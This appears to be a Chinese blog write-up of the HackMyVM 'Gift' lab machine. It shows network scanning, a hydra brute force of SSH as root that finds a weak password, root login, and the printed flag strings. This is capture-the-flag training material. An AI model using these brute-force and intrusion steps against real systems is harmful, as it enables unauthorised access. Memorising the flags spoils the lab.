HackMyVM-Gift

  • 开发
  • 17

目录

信息收集

arp

nmap

WEB

dirsearch

hydra

ssh连接

get root

信息收集

arp
┌─[root@parrot]─[~]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.106  08:00:27:a3:06:17  PCS Systemtechnik GmbH

Ending arp-scan 1.10.0: 256 hosts scanned in 1.975 seconds (129.62 hosts/sec). 6 res
nmap
端口扫描

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.106 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:33 GMT
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.62% done; ETC: 10:33 (0:00:02 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.15 seconds


服务版本信息收集

┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -p 22,80 192.168.9.106 --min-rate 10000 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:38 GMT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 10:38 (0:00:06 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00058s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds

WEB

dirsearch
┌─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.106/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/HackMyVM/reports/http_192.168.9.106/__24-04-13_11-15-10.txt

Target: http://192.168.9.106/

[11:15:10] Starting: 

Task Completed


 很简单??
hydra
既然80端口没有信息,我们直接爆破22端口得了!


┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.9.106
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-13 11:15:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.9.106:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 192.168.9.106   login: root   password: simple
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 3 to do in 00:01h, 10 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-13 11:19:19
ssh连接
┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $ssh root@192.168.9.106
root@192.168.9.106's password: 
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~#
get root
gift:~# cd /root
gift:~# ls -al
total 20
drwx------    2 root     root          4096 Sep 24  2020 .
drwxr-xr-x   22 root     root          4096 Sep 18  2020 ..
-rw-------    1 root     root            79 Apr 13 11:23 .ash_history
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat *.txt
HMVtyr543FG
HMV665sXzDS
阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-04-14 10:54:04       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-14 10:54:04       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-14 10:54:04       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-14 10:54:04       20 阅读

热门阅读

  3. 软件设计模式(Golang)

    2024-04-14 10:54:04       40 阅读

  4. LeetCode-热题100:146. LRU 缓存

    2024-04-14 10:54:04       16 阅读

  9. docker nginx-lua发送post json 请求

    2024-04-14 10:54:04       22 阅读

  12. P8683 [蓝桥杯 2019 省 B] 后缀表达式

    2024-04-14 10:54:04       20 阅读

  15. sed命令多行处理

    2024-04-14 10:54:04       20 阅读

  16. 迪米特法则

    2024-04-14 10:54:04       24 阅读

  18. 游戏内鼠标光标样式切换

    2024-04-14 10:54:04       14 阅读

  22. vue3组件注册

    2024-04-14 10:54:04       17 阅读

  23. 自动化运维(二十八)Ansible 实战之最佳安全实践

    2024-04-14 10:54:04       13 阅读

  24. 大数据之 Hive 快速搭建的详细步骤

    2024-04-14 10:54:04       16 阅读

  26. npm: .npmrc pnpm

    2024-04-14 10:54:04       14 阅读

  29. 电商用户行为数据分析

    2024-04-14 10:54:04       13 阅读